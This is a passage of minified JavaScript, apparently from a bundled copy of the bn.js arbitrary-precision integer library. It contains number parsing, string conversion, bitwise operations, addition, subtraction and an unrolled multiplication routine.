X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return 